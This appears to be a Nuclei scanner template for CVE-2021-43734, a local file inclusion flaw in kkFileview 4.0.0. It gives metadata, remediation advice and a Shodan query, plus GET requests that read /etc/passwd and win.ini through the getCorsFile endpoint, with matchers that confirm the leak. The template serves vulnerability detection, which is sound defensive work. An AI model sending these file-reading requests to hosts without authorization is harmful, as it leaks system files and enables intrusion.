49 lines
1.5 KiB
YAML
49 lines
1.5 KiB
YAML
id: CVE-2021-43734
|
|
|
|
info:
|
|
name: kkFileview v4.0.0 - Local File Inclusion
|
|
author: arafatansari
|
|
severity: high
|
|
description: |
|
|
kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host.
|
|
remediation: |
|
|
Upgrade to a patched version of kkFileview v4.0.1 or later, or apply the necessary security patches provided by the vendor.
|
|
reference:
|
|
- https://github.com/kekingcn/kkFileView/issues/304
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-43734
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-43734
|
|
cwe-id: CWE-22
|
|
epss-score: 0.03024
|
|
epss-percentile: 0.89811
|
|
cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: keking
|
|
product: kkfileview
|
|
shodan-query: http.html:"kkFileView"
|
|
tags: cve,cve2021,kkfileview,traversal,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
|
|
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- "for 16-bit app support"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402205cf1ca77bfae231224c11e047a367940c7af22634e3cd04c320b32e37b7227fa022070c97a4b1d75b7f2cae47fd5fb05c4748424566e0aef631a8be5e20c730022a4:922c64590222798bb761d5b6d8e72950 |